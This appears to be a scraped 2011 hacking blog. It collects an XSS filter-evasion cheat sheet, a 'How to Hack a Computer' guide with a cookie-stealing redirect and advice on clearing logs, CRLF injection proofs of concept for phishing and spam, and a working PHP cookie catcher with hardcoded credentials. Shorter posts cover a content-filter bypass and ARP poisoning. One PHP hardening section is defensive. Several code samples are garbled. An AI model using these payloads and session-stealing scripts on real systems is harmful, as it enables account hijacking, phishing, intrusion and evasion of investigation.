When this example is injected into an input box or a URL parameter, it will either fire or it will fail. If the injection fails, it doesn't mean the site is secure, it just means you need to look deeper.

XSS Filter Evasion

Escaping From Strings

The first step is to view source on the Web page and see if you can find the injected string in the HTML.There are several places you may find it completely intact, yet hidden from the casual observer.The first is within an input parameter:

<INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>

In this example we could alter our input to include two characters that allow the injected code to jump out of the single quotes:

'><SCRIPT>alert("XSS")</SCRIPT>

Now our code renders because we have ended the input encapsulation and HTML tag before our vector, which allows it to fire. However, in this case, the extraneous single quote and closed angle bracket are displayed on the Web page.This can be suppressed if we update our vector into the following:

'><SCRIPT>alert("XSS")</SCRIPT><xss a='

This turns the code output into:

<INPUT type="text" value=''><SCRIPT>alert("XSS")</SCRIPT><xss a=''>

As a result, the JavaScript code is injected with no visible indication of its existence.The <xss a=''> tag does not render, because it is not valid.

Working Around Filtered Quotes

Let's use the same example above, but assume the Webmaster included code to put slashes in front of any single quotes or double quotes (i.e., add_slashes()). Our previous vector without the last part would now turn into:

<INPUT type="text" value='\'><SCRIPT>alert(\"XSS\")</SCRIPT>'>

There are several methods to try and work around this it all depends on the filtering in place. One method is to use Character Entities. Some characters are reserved in HTML. For example, you cannot use the greater than or less than signs within your text because the browser could mistake them for markup. If we want the browser to actually display these characters we must insert character entities in the HTML source.

"	"	"	quotation mark, apl quote
&	&	&	ampersand
<	<	<	less-than sign
>	>	>	greater-than sign

Using the code (") or (") in place of our quotes is one method to try and work around quote filtering. Example:

<script>alert("XSS")</script>

<script>alert(&XSS&)</script>

If no quotes of any kind are allowed you can use fromCharCode in JavaScript to create any XSS code you need. The fromCharCode() takes the specified Unicode values and returns a string. Example:

<script>alert("XSS")</script>

<script>alert(String.fromCharCode(88,83,83))</script>

<INPUT type="text" value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'>

You can use the For MySql char(ASCII,ASCII,...): calculator bellow to translate your code into CharCode.

Working Around <SCRIPT> Filtering

Some filters will filter out <script> making it impossible for any of the above examples to work. However, there are many other ways to insert JavaScript into a Web page. Let's look at an example of an event handler:

<BODY onload="alert('XSS')">

The "onload" keyword inside HTML represents an event handler. It doesn't work with all HTML tags, but it is particularly effective inside BODY tags.That said, there are instances where this approach will fail, such as when the BODY onload event handler is previously overloaded higher on the page before your vector shows up. Another useful example is the onerror handler:

<IMG SRC="" onerror="alert('XSS')">

Because the image is poorly defined, the onerror event handler fires causing the JavaScript inside it to render, all without ever calling a <script> tag.

Using IMG SRC

The two most commonly permitted HTML tags are <A HREF, which is used for embedded links, and <IMG, which is used to embedded images. Of these two, the most dangerous is the IMG tag. The follow illustrates some examples of why this tag is problematic:

<IMG SRC="nojavascript...alert('XSS');">

No quotes and no semicolon:

<IMG SRC=nojavascript...alert('XSS')>

Filtering quotes and script:

<IMG SRC=nojavascript...alert("XSS")>

Using CharCode to work around filtering quotes:

<IMG SRC=nojavascript...alert(String.fromCharCode(88,83,83))>

A simple attack vector, like the one above, can be even further obfuscated by transforming the entire string into the decimal equivalent of the ASCII characters:

<IMG  SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

Using the ASCII table you can decipher this example, and then use the same method of obfuscation to create your own injectable string. The same can be done for hexadecimal:

<IMG SRC=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;& #x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;>

While the javascript: directive syntax inside images has been depreciated since IE 7.0, it still works in IE 6.0, Opera 9.0, Netscape 8.0 (when in the IE rendering engine, although it has also been depreciated as of 8.1)

Using Tab, New Line, and Carriage Return

Tab, new line and carriage return characters can also be used to trick XSS filters.

<IMG SRC="jav&#x9ascript:alert('XSS');">

The example above uses a tab Minimum Sized Decimal to break up the word javascript intern breaking up the XSS and tricking the filter. The output above will look as follows:

	Horizontal Tab	New line	Carriage Return
URL	%09	%10	%13
Minimal Sized Hex	&#x9	&#xA	&#xD
Maximum Sized Hex	&#x0000009;	&#x000000A;	&#x000000D;
Minimum Sized Decimal	&#9	&#10	&#13
Maximum Sized Decimal	&#x0000009;	&#x0000009;

Using Null character

Another character that can cause problems for filters is the null character. This is one of the most obscure and powerful tools in any XSS arsenal. Take this example URL that can lead to a valid injection:

<SCRIPT>alert("XSS")</SCRIPT>

The null character () stops the filters from recognizing the <SCRIPT> tag. This only works in IE 6.0, IE 7.0, and Netscape 8.0 in IE rendering engine mode.

Not filtering inside encapsulating pairs

Bypassing filtering that looks for open and closing pairs of encapsulation inside HTML tags and ignore the contents. Example:

<IMG """><SCRIPT>alert('XSS')</SCRIPT>">

Technically, inside the IMG tag, the first two quotes should be considered encapsulation and should do nothing.The next quote should allow encapsulation and go to the next quote which is after the </SCRIPT> tag. Lastly, it should be closed by the trailing end angle bracket. But all major browsers, such as, IE, Firefox, Netscape, or Opera take this as malformed HTML and attempt to fix it. The output then looks like:

<img><script>alert('xss')</script>">

CSS Filter Evasion

HTML is a useful tool for injecting JavaScript, but not the only tool an even more complex sub-class of HTML is the style sheet or CSS. There are many different ways to inject XSS into style sheets, and even more ways to use them to inject JavaScript. . The simplest way to inject JavaScript into a CSS link tag is using the JavaScript directive.

<LINK REL="stylesheet" HREF="nojavascript...alert('XSS');">

However, IE has depreciated this as of 7.0, and it no longer works, you can still get it working in Opera and users who may still have IE 6.0 installed. Another way is to use the <STYLE> tag. It is rare that users have access to modify styles but it does happen. This is more common in cases of forums where users have access to the layout and design on their post. The following will work in IE and Netscape in the IE rendering engine mode: <STYLE> a { width: expression(alert('XSS')) } </STYLE> <A> Using the above as an example, you can see how the expression tag allows the attacker to inject JavaScript without using the JavaScript directive or the <SCRIPT> tag.

<DIV STYLE="width: expression(alert('XSS'));">

Obscure Filters

Let's take an example where a developer has taken user input and insured that it contains no quotes, no angle brackets, and no JavaScript directives. Still, it is not safe, as we can inject something called a data directive in this case, we have base64 encoded the simple string <script>alert('XSS')</script>.

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

The data directive allows us to inject entire documents inside a single string. The data directive works inside Firefox, Netscape in Gecko rendering engine mode, and Opera.

Using Double Quotes

If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents.

Escaping characters

Escaping quotes is sometimes usefull when there is an own written protection against XSS. This will allow you to escape the escape characters used by the XSS filter script.
It's worth mentioning that this will ONLY work if it's an own written (weak) defending script.

The result would be:

As you can see your own escape characters now filter out the escape characters used by the XSS protection.

Encoding

It is often assumed that if all angle brackets and quotes have been filtered that XSS is no longer possible. However XSS is reliant upon the browser, so as long as the browser can understand other encoding methods, you can run into situations where a browser will run commands without any of those characters.
A real world example of an XSS encoded vulnerability was found in Google search appliance by a hacker named Maluc. Maluc found that a normal Google search appliance query looked like:

http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro">http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro xystylesheet=stanford&site=stanfordit&oe=UTF-8&q=hi

He noticed that according to this string (oe=UTF-8) he could change the UTF code. He changed the UTF string from UTF-8 to UTF-7.
UTF-7 (7-bit Unicode Transformation Format) is a variable-length character encoding that was proposed for representing Unicode-encoded text using a stream of ASCII characters, for example for use in Internet e-mail messages. UTF-7 is generally not used as a native representation within applications as it is very awkward to process despite its size advantage over the combination of UTF-8 with either quoted-printable or base64.
Lets take for example:

<script>alert("XSS")</script>

And encode it using UTF-7:

+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-

Now all + have to be changed to URL code in a GET strings for this to work. So the URL code for + is %2B now we have:

%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-

URL encoding is turning a string into a safe block of text for appending on the query string of a URL.To encode characters to append to a URL, you use a percentage symbol, followed by the two-digit hex number representing that character.
For example:

Original character	Character Entity Reference
space	%20
/ (forward slash)	%2F
" (double quote)	%22
? (question mark)	%3F
+	%2B

With this Maluc came up with:

http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro">http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro xystylesheet=stanford&site=stanfordit&oe=UTF-7&q=%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-x

And was able to successfully execute an XSS script.
Of course the effect of the XSS is only temporary and only affects the user who go to that URL, but this could easily provide an avenue for phishing. In this way, Google appliance has hurt Stanford University's security by being placed on the same domain.

XSS and post method

2011-09-10T23:09:00.002+05:30

XSS and post methods When a webpage uses the GET method to submit user inputs through a form, XSS is easily executed, by constructing a url for example like http://www.xssvulnsite.com/index.asp?q=">alert("XSS"). But when a webpage uses the POST method it is not possible to craft such an url, using it as a link, because the page doesnt use the url to send the user inputs to the form. Although it is still possible to achieve XSS vulnerability exploitation. So lets suppose one more time vulnerable site http://www.xssvulnsite.com/ using a form to search or submit data. Very synoptic html code:

Code

To exploit XSS vulnerability we can use an indirect way. So another file will be written and then loaded to another page, lets say the file hack.html and the page http://www.redirectingpage.com/hack.html What are its contents? In the hack.html file the following code will be written

Code

setTimeout(formX.submit(),1);

We can see that we are using the parameters of the original form to the form of the redirecting, a hidden form and in value a script, wanted to be executed, a photo, text, whatever we like to use in XSS hole. Follows a script that when opens the middle page loads the XSSed vulnerable page after 1msec.

Saving the World, One Vulnerability at a Time

2011-09-10T23:06:00.002+05:30

x00 - Intro
Hey there, I was going to make a video going over this information but when I got around to it, it seemed like a boring subject to watch. Anyways I wanted to go over a few different techniques to help prevent some of the more common web vulnerabilities that are seen; such as: Cross-Site Scripting, Full Path Discplosure, Local/Remote File Inclusion, SQL Injection, Cross-Site Request Forgery. Each of the techniques I plan to cover are geared towards securing PHP source code, so if you code in Perl, ColdFusion, ASP, or some other web language this probably isn't going to help much.

0x01 - Cross-Site Scripting (XSS)
Hopefully you already know about XSS and how the attacks work. As of PHP version 4.x.x there was a feature called "magic_quotes_gpc"; though magic_quotes was actually made to prevent SQL vulnerabilities it also helps with XSS because this feature adds slashes (\) anytime a quotation (") is present in either the GET, POST, or COOKIE fields hence the "gpc." Although magic_quotes is a nice feature to have as of PHP version 5.3.0 it is now considered deprecated, and actually as of 6.0.0 its removed completely, so as a web developer we need a new method of adding slashes. We can do this with a function called...you guessed it addslashes() so what these features would do if an attacker used alert("test"); the output generated would be alert(\"test\"); though this is easy to get around with the javascript function fromCharCode(). A possibilities to help this vulnerability is regular expressions such as preg_match or preg_replace. Another simple form of XSS comes into play when the developers use the PHP_SELF variable; which is vulnerable by default. Developers could make a script such as

Code



   echo(\"You have viewing: \" . $_SERVER['PHP_SELF']);

?>

and the attacker would simply append "/" onto end of the url for example:

http://site/index.php/alert("test");

A solution to this problem is a function called basename(). basename() is set to what ever text is placed after the final forward slash (/) which in our attackers case would be "script>" so now even though our script is still not functioning properly it is no longer vulnerable to the attack. Another important function to keep in mind is the htmlspecialchars(), this function converts characters into their html entities for instance < becomes <

0x02 - Full Path Discolsure (FPD)
Full path discolsures happen when error reporting is enabled for web applications and there is actually a pretty easy fix for it. In the php.ini file there is an option for "display_errors" which as of PHP 5.2.4 has three possibilities: on, off, stderr. STDERR displays errors for applications other than web, so stderr and off are both safe. Another way to set this option is the PHP function ini_set() which could look like ini_set("display_errors",0).

0x03 - Remote File Inclusion (RFI)
In order to fix the RFI vulnerability you can simply turn off the allow_url_include option in the php.ini file much like we did with the FPD. Although once the allow_url_include is off LFI comes into play and needs to be avoided.

0x04 - Local File Inlusion (LFI)
Local file inclusion vulnerabilities can be performed with functions such as but not limited to:
include()
include_once()
require()
require_once()
virtual()
readfile()
fread()
fgets()
file_get_contents()
highlight_file()

There are a few simple techniques to patch a LFI vulnerabiltiy, setting open_basedir either at runtime with ini_set() or in the php.ini or httpd.conf files, you could also use a switch statment or if/elseif statement. open_basedir is not completely safe though; when using this method the script is restricted when using other files to the give path. Although, if the path is incorrectly set an attacker would still be able to possibly perform the LFI attack on our files. There are a few somewhat complex ways of bypassing SAFE_MODE/open_basedir; although by the time an attacker can attempt these it will already be too late for you because they are on the inside already. Example: lets say as the developer we issue open_basedir to only allow access to our website's root folder "/home/oursite/www/public_html/". This will restrict an attack so they will not be able to inject php code in our access/error log files or use /proc/self/environ and include a shell from our script, it will also restrict the attacker from viewing any other sites hosted on the server if any are present. This does not however protect the files within our website such as a config.php which could include our sql server information.

Vulnerable code could look like:

Code



   inlcude(\"./\" . $_GET['file']);

?>

it can easily be fixed

open_basedir:

Code



   // open_basedir restricts the php script from accessing file and directories outside of the given scope

   ini_set(\"open_basedir\", \"/home/oursite/www/public_html/\");

   include(\"./\" . $_GET['file']);

?>

Switch:

Code



   switch($_GET['file'])

   {

      case \"index.php\":

         include(\"./index.php\");

         break;

      .

      .

      .

   }

}

if/elseif:

Code



   $file = $_GET['file'];

   if($file == \"index.php\")

   {

      include(\"./index.php\");

   }

   elseif($file == \"users.php\")

   {

      include(\"./users.php\");

   }

   else

   {

      include(\"error.php\");

   }

?>

As you can see the open_basedir solution is easier but creating a whitelist using a switch or if statements as more effective. You could also use regular expressions to check for directory transversal, but this can typically be bypassed fairly easily which is why its not given as a solution.

0x05 - SQL Injection
As said during the XSS section, magic_quotes_gpc was created to help prevent sql attacks as well as the addslashes() function. Another function geared towards protecting the site's database is mysql_real_escape_string(). mysql_real_escape_string escapes special characters such as \x00,\n,\r,\,'," and \x1a; so the developer could create a query that is vulnerable:

Code



$id = $_GET['id'];

$query = \"SELECT * FROM products WHERE id = $id\";

this can be secured with the previous function

Code



$id = mysql_real_escape_string($_GET['id']);

If your user input variable is suppose to only be a number, like the previous example, you could also use is_numeric() which obviously checks whether the variable is a number.

Code



$id = $_GET['id'];

if(is_numeric($id))

{

   $query = \"SELECT * FROM products WHERE id = $id\";

}

0x06 - Cross-Site Request Forgery (CSRF)

How to hack a Computer

2011-09-10T23:04:00.000+05:30

*****How to Hack a Computer*****
Table of Contents

Chapter 1: Preperation.

Chapter 2: Analysis.

Chapter 3: Testing for a vulnerability.

Chapter 4: Exploitation of said vulnerability.

Chapter 5: Covering your tracks.

Disclaimer: I, Stormc1nd3r, take NO RESPONSIBILITY whatsoever for what you do with
the information that is written in this guide, which was written for general matters of interest & legitimate use ONLY!

Preface: This guide assumes you know the basics, e.g. Javascript injections, XSS
cookie exploitation, directory navigation, etc, but need a way to put it all together.

Feel free to post this guide wherever, but please leave a link to HvS/SO. www.securityoverride.com

Chapter 1: Preperation.

First, you need software, all the software listed can be found with a simple Google search.

Cain & Abel
Putty
Nmap
Firefox (Firefox addons are in {.)
{Add N Edit Cookies
Firebug
Live HTTP headers
NoScript
SQL Injections
Tamper Data
URLParams
User Agent Switcher
Web Developer}
Net Tools
Wireshark
TOR
XeroBank Browser
Perl
Python
PHP

If you need more general hacking skills, check out the HvS challenges, as well as w3schools.com.

Chapter 2: Analysis.

All good hacking begins with analysis. Start by doing a scan on your target using Nmap.
Take note of all the information you get, it will be useful. The ports it runs & the OS it uses will be useful when searching for vulnerabilities on the system.
Next, decide what port you want to attack, but make sure you know how the protocol that the port runs works. Once you've connected, try to learn all you can about
the system, usally the server will tell you what software is used to run it, look it up on Milw0rm.com. Try using the "help" command once connected. Check the page source for
forms, directories, clues as to what software the server uses,
for example, a server might use Perl, you could because you would see files or directories
that end in .pl. Make sure to write down EVERY clue you get, what computer languages the server uses, what version of Apache, etc. (try going to www.example.com/images, usally at the bottom
of the page it will tell you what version of Apache it runs.) as stated before, visiting the server on different ports is a good & fast way to pick up clues. If the server has an open FTP server, (port 21)
try logging in as anonymous without entering anything as a password. If you get in, visit the directorie /etc and the sub-directories /group/ and /passwd/ for information on the users on the server.
Make sure to try every port on the site, even if it doesn't seem important, if you connect to the port, it will usally tell you what software it's running, this can often be exploited with a simple Milw0rm.com search. Also, be careful!
Sites often leave honeypots (bait). For example: you connect to a server on port 25 (SMTP), you use the "help" command to see what commands the server allows, you see that the server allows the "debug" command, which you know can often be exploited, so you run the command, and get kicked off the server,
and get IP banned.

Chapter 3: Testing for an exploit.

Once you have found a good clue which you think will be useful in hacking into the server, you should generally test it out before searching around more. Here's an attack scenario: Tom's rival, Huck, recently made an account on an online social networking site. Tom wants to log in as Huck, and send rude pms to Huck's friends.
He then goes of the server with a proverbeal fine-toothed comb. He notices that there's a form that is used to send other users messages. Tom decides to check to see
if the form is vulnerable to XSS attacks. To test it out, he sends himself a message with a basic script in it the script reads: alert("BOO!").
When he opens the message, a Javascript alert reading "BOO!" pops up. Tom now knows that it IS indeed vulnerable to XSS attacks. He sends Huck a Message with the following script in it:document.location="http://bla.com/cookie.php?c=" + document.cookie
When Huck opens the message, he sends him to a location on Tom's server which contains a PHP script, which steals Huck's cookies, and redirects Huck to a different site. Tom uses
Javascript to change his cookies to match Huck's, which effectively logs him in AS Huck. He then sends hateful messages to Huck's friends, strongly damaging his personal life. This is only a basic example, but it
shows how critical research is. Here's another example, in which a tiny sliver on information leads to the downfall of the server: you find out that the server you want
destroyed, defaced, pillages, haxxored, or otherwise illegaly abused, uses Apache 1.2.3. You go to Milw0rm.com and search "Apache 1.2.3". You find an article containing how to exploit that version of Apache
to login as an administrator. You launch the exploit & get in. See the difference made by the tiny shard of information?
Basicly, if you find something interesting on a site, be it possibly exploitable software, a shoutbox, or a possibly XSS vulnerable form, you need to do research on it to see if it can be used for your own benefit. Sometimes you can test this yourself, like in the above example,
but often you won't know how to exploit what the server is running (like say your clue is subtle, like the version of Apache the server runs), you can try a Google search,
like say "Apache 1.1.12 exploit". Or you can try searching on a security-based site like securityfocus.com or Milw0rm.com.

List of items to check for on every server.
- Ports.
- Source of all critical looking pages, if site is small, then every page.
- Check the at cookies different times on the site. While logged in, while logged out, etc.
- Check the headers of the important pages on the site.
- If you find a directory list, be sure to look around well, and try default password directories.
- Try searching a feature you find on the site on Milw0rm. For example, if the site uses PHP, look for PHP exploits. (This goes for other languages too.)
- Try typing the website url into your browser, but instead of http:// use ftp://. If asked for a username & password, use this: Username:anonymous Passoword:

Chapter 4: Exploiting the vulnerability.

This is going to be a short chapter this the actual exploitment is pretty straightfoward
once you've found the vulnerability. Just use the attack you researched on the site, and be quick about it.
Make your plans for what you'll do when you've exploited the vulnerability before you break in.

Chapter 5: Covering your tracks.

There are many ways to avoid getting caught, even if you have permission,
you might want to do this just to prove that you know what you're doing. If you're a student, you might be required to do this to pass. Generally, the
best way to cover your tracks is never to have left them. Download XeroBank,http://xerobank.com/, (Firefox with built-in TOR),
or use a web based proxy, if you choose the latter, I recommend hvs.php-invent.com/prox. The user is hvs, the pass is proxy.
But if you DID leave tracks, then look around the server for logs, if you gained admin privledges it should
be no problem to clear them. URL Params for Firefox is a useful tool for log clearing. If you find a "clear logs" button, but it doesn't work, check your cookies for something
along the lines of "authorized" or "admin" and change the value to 1. You can also try injecting the logs command with Javascript, or trick someone who can into doing it.

CRLF Injections

2011-09-10T23:02:00.001+05:30

----------------------------------------
[0x] Table of Contents
----------------------------------------

[1x] - What is a CRLF Injection?
[2a] - Vulnerability PoC - Comment System
[2b] - Vulnerability PoC - Email Form
[2c] - Vulnerability PoC - Header Injection
[3x] - Patching
[4x] - References
[5x] - Conclusion

----------------------------------------
[1x] What is a CRLF Injection?
----------------------------------------

Carraige Return Line Feed (CRLF) work due to improper sanatization in user input. The carriage
return is essentially the same as hitting 'Enter' or 'Return', creating a new line. The
carriage return can be represented in a few different ways: CR, ASCII 13 or r. Both the carraige
return and the line feed do essentially the same thing. Although, the line feed is represented as
LF, ASCII 10 or n. These commands are printer commands, the line feed tells the printer to feed
out one line and a carriage return said the printer carriage should go to the beginning of the current
line. In the event you know the operating system of the target machine it will prove useful to know
that Windows uses CR/LF but *nix systems only use LF.

----------------------------------------
[2a] Vulnerability PoC - Comment System
----------------------------------------

To illustrate the first method of CRLF we will be using a hypothetical comment application which is
vulnerable to the attack. Let's say our current comment system looks like so:

8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....

Keep in mind both of these posts are legitimate. To exploit the vulnerability our attack will craft
a post that will make it seem like he's posting as an administrator. He will enter the following in
to the comment box:

Yep, doesn't work..n10/04/07/ - Admin I've relocated the login to http://attackersite.com/login.php,
you should be able to login there.

This extremelly simple injection will change the comment output the following result.

8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....
09/04/07 - EthernetYep, doesn't work..
10/04/07 - Admin I've relocated the login to http://attackersite.com/login.php

As you can clearly see in the example, by posing as an administrator we are able to phish passwords
from the unsuspecting users. By inserting our new line character in to the post we can go down a line
and pretend to be an administrator. It's a pretty neat trick.

----------------------------------------
[2b] Vulnerability PoC - Email Form
----------------------------------------

The second and final example involves a script used to send emails to other users. The catch is that
you cannot see the real email address of the person you are sending to. To exploit this we can simple
insert the following in to the 'Subject' header:

Hey, it's DavenBcc: dave@email.com

This injection will send the email over to dave@email.com AND the person we originally specified in the
'To' column. These mail forms can also be exploited by spammers in order to hide their identity. By
using a similar method as above they can'Cc' and 'Bcc' the message to 100's of other people spamming their
inboxes anonymously.

----------------------------------------
[2c] Vulnerability PoC - Header Injection
----------------------------------------

As an alternative to inserting the carriage returnline feed in to an input box we can also use a program like
Achilles to intercept the POST headers and then modify them. Using a similar example as to the Email Form
example above we could change our headers like so:

Content-Type: application/x-www-form-urlencoded
Content-Length: 147

name=This+is+a+test+&emai l=dave@coldmail.com&subje ct=Test&header=Header:
noone@thingy.com
CC:fbi.gov@meow.com
Bcc:enigmagroup.test.@eg. com,
psychomarine@enigmagroup. org,
ausome1@enigmagroup.org
&msg=crlf!

As you can plainly see in the above example we are able to modify the header in order to spam those email
addresses.

----------------------------------------
[3x] Patching
----------------------------------------

The CRLF vulnerability is extremely easy to patch. The following code example assumes the input is set to
$_POST['input'].

if (eregi('n', $_POST['input'])) //This checks for the new line character in the POST variable
{ //start if..
die("CRLF Attack Detected"); //exit program if CRLF is found in the variable
} //end if..

I have commented the code so that you can gain an idea of how we are fixing this vulnerability. As you can see
it doesn't take much to thwart this vulnerability. Sadly, not many people are implementing such a patch.

----------------------------------------
[4x] References
----------------------------------------

http://ca.php.net/manual/en/function.eregi.php - PHP Eregi function used in patch
http://en.wikipedia.org/wiki/CRLF - General CRLF information
http://www.owasp.org/index.php/CRLF_Injection - OWASP CRLF stub article

Cookie Catcher

2011-09-10T22:58:00.000+05:30

This article will teach you how to make a cookie catcher.

What is a cookie?

A cookie is a special thing used store information on a web browser such as user logins, passwords, etc.

What is a cookie catcher?

A cookie catcher is a php script which captures a browser's cookies.

Is making a cookie catcher hard?

Not at all. The hard part is getting someone to click on a link which contains the cookie catcher.

Creating The Cookie Catcher:

Now we are going to get down to the cookie catcher.

First you need a webserver that supports php.

Now that you have that we can begin.

Here is the cookie catcher:

Code

$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Website: '.$referer.'

');
fclose($fp);
header (\"javascript:history.back()\");
?>

Now let's break that piece of code down:

Code

This tells the server that this piece of code up to the

Code

?>

is all php code.

Code

$cookie = $_GET['cookie'];

This gets the cookie from the web browser using php's GET statement.

Code

$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$referer=$_SERVER['HTTP_REFERER'];

REMOTE_ADDR is the user's IP Address.
date is the date the cookie was taken.
HTTP_REFERER is the site the user came from.

Code

$fp = fopen('cookies.html' 'a');
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’

’);
fclose($fp);

This piece of code does a couple of things. First is opens a file called cookies.html on the server. Then it writes the cookie info to the file (Cookie it's self, date, and website the person came from). After that it adds three returns (
). Next it closes the file cookies.html.

Code

header (\"javascript:history.back()\");

This last piece of code sends the user back to the last page they were on before they clicked on the link.

Code

?>

This, like stated earlier, ends the php script.

There it is! You've made your very own cookie catcher for stealing cookies from people's browsers!

Example Script:[/b}

An example of this script in action is:

http://www.bluechill.co.cc/cookietest.php

http://www.bluechill.co.cc/cookies.php (view the cookies you've had from bluechill.co.cc in the last day.

It only shows cookies from your IP.

Have fun with your new found cookie catcher!

[b]Extras:

Here is the source code for those pages (including a mysql database ;) )

Cookietest.php:

Code

setcookie(\"Test\",\"Test Cookie For Cookie Catcher\",time()+3600);
echo \"Test Cookie: \";
echo $_COOKIE[\"Test\"];
echo \"
\";
?>

document.write(\"
Code

$ip = $_SERVER['REMOTE_ADDR'];
$con = mysql_connect(\"localhost\", \"USERNAME\", \"PASSWORD\");
$db = mysql_select_db(\"TABLENAME\");
$result = mysql_query(\"SELECT * FROM cookies WHERE IP = '$ip'\");
$i = 0;
while($row = mysql_fetch_array($result))
{
   echo \"Cookie \" . $i . \"

\";
   echo \"Cookies: \" . $row['Cookies'] . \"
Site: \" . $row['Site'] . \"
Date: \" . $row['Date'] . \"
Your IP: \" . $row['IP'] . \"

\";
   echo \"
\";
   $i++;
}
mysql_close($con);
?>

Cookiecatcher:
Code

$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(\"Y-m-d\");
$referer=$_SERVER['HTTP_REFERER'];
mysql_connect(\"localhost\", \"USERNAME\", \"PASSWORD\");
mysql_select_db(\"TABLENAME\");
$sql_query = mysql_query(\"INSERT INTO cookies (Cookies,Site,Date,IP) VALUES ('$cookie','$referer','$date','$ip')\");
echo \"Cookie Entered Successfully\";
?>

Code for resetting database:
Code

   $con = mysql_connect(\"localhost\", \"bluechil_admin\", \"TonyHawk\");
   $db = mysql_select_db(\"bluechil_cookies\");
   $query = mysql_query(\"TRUNCATE TABLE cookies\");
   mysql_close($con);
   echo \"Table Reset!\";
?>

Have fun! :)

By-pass Dailymotion explicit content filter

2011-09-10T22:55:00.000+05:30

If you want to watch an "explicit content" video at www.dailymotion.com but don't feel like creating a user just for that reason, here's what you do.

1. Go to the page that contains the video you want to see.

2. In the URL, replace the part that says "www" with "iphone".

For instance:
before: http://www.dailymotion.com/video/bla-bla-bla
after: http://iphone.dailymotion.com/video/bla-bla-bla

Now you'll have access to the iphone version of that same page. It's what you would see if you navigate to the first URL using an iPhone or iPod Touch.

3. Double click on the video thumbnail. This makes the video start loading. You might have to double click the image again to make it play.

4. Alternate between "play" and "pause" by double clicking the image.

That's all nice and good, but the problem is that the video box is super tiny. No problem! Keep reading...

5. Open "firebug".

6. Run a search or manually find the following code snippet "embed width=100" (without the "quotes").

7. Modify the width and height to be 1000 and 800 or something big like that.

8. Enjoy! (Note that this will show the video's original size and not stretched. It might be smaller than the regular non-iphone version of the page).

***Alternate Way***

Do steps 1 and 2.

3. View the source code for that page.

4. Run a search for the keyword "auth" (without the "quotes"). If should only throw back one result.

5. Copy the whole string that contains that keyword. It should look something like:
http://proxy-63.dailymotion.com/video/538/713/21317835%3amp4_h264_aac.mp4?auth=1285078599-2ffdec30914540f317ce830fa9146425&cache=0
This link is NSFW!!

6. Paste that URL in a new tab.

This will get you a page that only contains the video. The beauty of it is that you can just go to "File - Save as" and download the file to your hard drive.
Note: If you erase the question mark and everything else after it in the step 5 URL, you won't be able to access the site as you don't have permish. I don't know if these tokens expire, so it could be probable that the above link would throw a 403 or 404 Status Code by the time you read this article.

Moral of the story 1: You don't have to be an elite hacker to bend a site into doing what you want.
Moral of the story 2: Even huge sites like Dailymotion have these stupid holes that allow users to get access to things they only want logged users to see.

ARP Poisoning

2011-08-12T17:57:00.000+05:30

- Difference between a switch and a hub
- What is ARP?
- What is ARP Poisoning?

Difference between a switch and a hub

If you have a network running with a hub, there is no need for ARP Poisoning to sniff the network. Because if you send information over a hubbed network, all computers will receive the data. The hub gets the information, and sends it out on all ports. But, on a switched network only the destination computer gets the data. That means that your sniffer won't pick up anything, unless it is for you. The switch uses an addressing system called Media Access Control (MAC). Every computer has a MAC address. The switch holds and maintains a table that associates MAC addresses with certain ports, so that the info will only be sent to the given MAC address. A computer can not communicate with another computer before it has it's MAC address, simple as that. This is where the Address Resolution Protocol (ARP) comes in.

What is ARP?

Address Resolution Protocol (ARP) is a method for finding a host's MAC address when only the IP is known. If a computer wants to communicate with another computer over a network it will first see if it already knows the MAC address, if not it will send out a an ARP request in order get it. An ARP request is one of four types of messages in ARP. But the two main types is ARP request and ARP reply, which I will be covering in this article. The ARP request contains the senders MAC address and IP, and it requests the MAC address of the given IP. The reason that it is holding the senders MAC and IP, is so that the receiver can update his ARP cache with this information too, before he sends the reply with his MAC. Did I hear you ask what an ARP cache is? It is a temporary storage place on your computer that associates IP addresses of other computers with MAC addresses.

What is ARP Poisoning?

Now, if you want to sniff the network, you have to get the traffic to go through you. One way to do this is ARP Poisoning. The weakness is: All computers will accept an ARP reply, even if there never where an ARP request. In other words, you can send a customized ARP reply to your target computers, which will update their ARP cache with a new MAC address - yours. So when a computer wants to send something to another computer, it will find it's MAC address in the ARP cache based on the IP - that MAC address is now your MAC address. So when it sends something to the MAC address, it sends it to you. But keep in mind, you have to send the packets on, or you will end up with a DoS. Another thing you have to think of, is that from time to time the ARP cache of a computer gets flushed, if there is no traffic. So you have to send a new customized ARP reply to the targets like every 10th second or so, but this can be done automatically.

Basic Linux Commands

2011-08-12T17:44:00.000+05:30

All of the following commands should work from your terminal, regardless what shell you are using.

